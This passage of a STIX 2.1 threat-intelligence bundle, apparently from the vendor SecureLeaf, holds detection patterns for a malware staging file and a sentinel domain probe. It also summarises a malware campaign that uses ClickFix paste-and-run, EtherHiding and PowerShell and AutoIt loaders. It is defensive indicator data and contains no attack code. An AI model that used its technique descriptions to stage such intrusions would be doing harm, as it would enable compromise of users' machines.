   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--f04ffb28-6ede-5881-82a6-3785d2c7b7eb",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Staging path %APPDATA%\\c\\IntroductionChassis.exe",
   "description": "Host artefact recovered from the stager script; the directory and archive names are campaign detail and may rotate.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[file:name = 'IntroductionChassis.exe' AND file:parent_directory_ref.path LIKE '%\\\\AppData\\\\Roaming\\\\c']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "indicator",
   "spec_version": "2.1",
   "id": "indicator--464671d4-5b57-5894-98ee-b0501b00f7df",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "Sentinel probe — NXDOMAIN verified",
   "description": "Verified live 2026-09-02: queried at t+86.63 s, answered rcode 3 (NXDOMAIN), with microsoft.com resolving 27 ms later. Wire order is sentinel-then-microsoft.com, the reverse of decompiled source order.",
   "indicator_types": [
    "malicious-activity"
   ],
   "pattern": "[domain-name:value = 'BLKcXXxNNJsPfGATrtzbZZxCm.BLKcXXxNNJsPfGATrtzbZZxCm']",
   "pattern_type": "stix",
   "pattern_version": "2.1",
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "description": "v15.3 consolidated — a3x decompiled, native core recovered, verified against the 2026-09-02 detonation capture",
     "external_id": "SL-ADV-2026-WP-001"
    }
   ],
   "valid_from": "2026-09-02T03:14:39.736229Z",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--fefc3060-e7a7-5e8f-9cad-f0dab71a34b1",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--95563f50-86cf-5bcf-8211-13ebe2a62cbf",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--ae36f6f2-967c-5573-92d5-4b33ba40cb8b",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--58702166-10b5-57dc-8531-30b963a23af8",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--c00d0d64-bdf7-5cc6-a9fe-a550b897f2c3",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--3913e09f-aad6-5013-9293-ec181c331385",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--985b9eab-eb5e-5e01-abd8-bb6853210fbb",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--f04ffb28-6ede-5881-82a6-3785d2c7b7eb",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--a20fde64-b2fb-5bd0-bea3-1441fbb280d6",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--464671d4-5b57-5894-98ee-b0501b00f7df",
   "target_ref": "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "relationship",
   "spec_version": "2.1",
   "id": "relationship--f63bde4c-b426-534f-9933-1386f6c09c2c",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "relationship_type": "indicates",
   "source_ref": "indicator--95563f50-86cf-5bcf-8211-13ebe2a62cbf",
   "target_ref": "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  },
  {
   "type": "report",
   "spec_version": "2.1",
   "id": "report--e59746d4-fec1-566c-99d1-7fb6063de524",
   "created_by_ref": "identity--cd9f1601-6614-59bf-b144-4205ee415898",
   "created": "2026-09-02T03:14:39.736229Z",
   "modified": "2026-09-02T03:14:39.736229Z",
   "name": "SL-ADV-2026-WP-001 v15.3 — Remus (WP-002) via ClickFix & EtherHiding",
   "description": "Consolidated advisory for the WP-002 / Remus cluster: compromised WordPress lure, BSC-testnet EtherHiding stage, ClickFix paste-and-run, PowerShell stager, IExpress SFX, compiled-AutoIt loader, and the native x64 core recovered from that loader. Supersedes and fully contains v15.1 and v15.2. Static findings derive from the decompiled Corpus.a3x and the core unwrapped from it; network findings from a 2026-09-02 detonation capture with embedded TLS secrets. Attribution held at infrastructure level; compromised victim hosts are never blocklisted.",
   "report_types": [
    "malware",
    "threat-actor",
    "attack-pattern"
   ],
   "published": "2026-09-02T03:14:39.736229Z",
   "object_refs": [
    "malware--df0839a2-9f29-5346-88c0-e58e63f7f8b5",
    "attack-pattern--4ee5584d-24c1-5b81-bebe-c8965953b23b",
    "attack-pattern--8aa7ed1b-a02f-5a78-9ff5-9aeac9cf53e8",
    "attack-pattern--22efb52c-523e-5ddb-b47e-71349c9dfae8",
    "attack-pattern--b0f1ec37-689a-5888-83e0-f1d64ec4620b",
    "attack-pattern--d8a41404-841c-5199-b96b-51214793f2ed",
    "attack-pattern--645ac42c-f600-57e4-8854-a190bb398dd3",
    "attack-pattern--fce0929a-efa9-5d0d-8c3e-aeff83953378",
    "attack-pattern--7c310323-a39f-524b-a299-8bdd3188d9c8",
    "attack-pattern--1f7ca2be-41aa-50c1-83e4-0de0bf23cef7",
    "infrastructure--48e22724-14b7-502e-9960-1ebb02f8eb05",
    "infrastructure--d9d7e354-d7d8-5443-8a63-b1a55cea1d19",
    "infrastructure--f4349a82-f96b-57df-8a4b-4730dd7ef6fa",
    "infrastructure--27db47d5-a5e1-553e-9b57-9782ab927232",
    "indicator--be3758b2-7209-5273-bf1c-15c5e9d182bd",
    "indicator--3d1a8918-8360-561f-9558-99032bc242cb",
    "indicator--6925510a-ab14-5c3f-b3e4-65f4207050e6",
    "indicator--6f4e48e6-7d0d-597c-92ba-12f1e0309600",
    "indicator--bcac4e93-ec79-5cb2-8066-5527f0804aa7",
    "indicator--6695b7b0-8a6f-5507-b843-2679b4147a27",
    "indicator--8e9bce63-50f6-559a-bb8b-a5d46fcaf0a2",
    "indicator--2e948793-58f2-59f9-8516-f71fd65b3bfe",
    "indicator--1632dbac-b073-5279-bc26-dd41ceb1bc65",
    "malware--7ac27fb6-ab84-568f-bc84-a9198ff17f72",
    "malware-analysis--a2b5a860-09e7-5d6c-a6a2-f81e74dc0c9e",
    "attack-pattern--678c7218-3a5d-56a9-b415-22a27296dfd3",
    "attack-pattern--ddb1b342-5c58-5634-ab64-e538faedc8e6",
    "attack-pattern--377f3e57-25df-5aa0-9967-db5654326c7a",
    "attack-pattern--0e2e7fa2-d95f-5e01-aaac-58bf764d2250",
    "attack-pattern--9b294875-de76-5ef7-bdb0-2b829f5f325e",
    "attack-pattern--7a62b028-e7cc-5309-aa3a-640f10d56d15",
    "attack-pattern--b2c9eb80-4706-5fa2-aeb5-9ad91d976544",
    "attack-pattern--380b1778-8847-579c-aea9-d8c0875f5d2b",
    "indicator--1d4d0765-f949-5b72-94de-1a887544c86c",
    "indicator--3cf1b58a-94bc-56df-8ae6-f163dd67b175",
    "indicator--d7a6196e-43a0-5e57-974f-1cceea14496f",
    "indicator--5e9880f6-9f9e-5303-aa6d-1fe6ddb77a10",
    "indicator--a056381d-f57a-5e14-9199-06dc0bc2fa31",
    "indicator--cb6e2d3d-04ae-54e8-ab0f-78789176397a",
    "indicator--95563f50-86cf-5bcf-8211-13ebe2a62cbf",
    "indicator--58702166-10b5-57dc-8531-30b963a23af8",
    "indicator--3913e09f-aad6-5013-9293-ec181c331385",
    "indicator--f04ffb28-6ede-5881-82a6-3785d2c7b7eb",
    "indicator--464671d4-5b57-5894-98ee-b0501b00f7df"
   ],
   "external_references": [
    {
     "source_name": "SecureLeaf",
     "external_id": "SL-ADV-2026-WP-001",
     "url": "https://secureleaf.dispensight.com/SL-ADV-2026-WP-001"
    }
   ],
   "object_marking_refs": [
    "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
   ]
  }
 ]
}